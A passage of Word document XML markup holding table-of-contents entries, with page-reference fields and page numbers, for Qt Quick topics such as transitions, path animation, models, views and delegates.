            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Tv Tennis</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605569 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>293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70" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Easing Curves</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605570 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>293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71" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>States</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605571 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>293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72" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Transitions</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605572 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>293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73" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>PathAnimation</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605573 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>294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74" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>PathInterpolator</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605574 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>294</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575" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Important Concepts In Qt Quick - Data - Models, Views and Data Storage</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605575 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>295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76" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Models and Views</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605576 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>295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77" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Data Storage and Access</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605577 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>296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78" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Models and Views in Qt Quick</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605578 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>296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79" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Displaying</w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Data</w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>with</w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Views</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605579 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>297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80" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Decorating Views</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605580 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>297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81" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Mouse and Touch Handling</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605581 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>298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82" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView Sections</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605582 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>299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83" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>View Delegates</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605583 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>300</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84" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Accessing Views and Models from Delegates</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605584 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>300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85" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Models</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605585 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>302</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86" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListModel</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605586 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>303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87" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XmlListModel</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605587 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>303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88" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>VisualItemModel</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605588 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>304</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89" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Integers as Models</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605589 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>304</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90" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Object Instances as Models</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605590 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>305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91" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>C++ Data Models</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605591 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>305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92" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Repeaters</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605592 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>305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93" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Using Transitions</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605593 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>307</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594" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Using C++ Models with Qt Quick Views</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605594 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
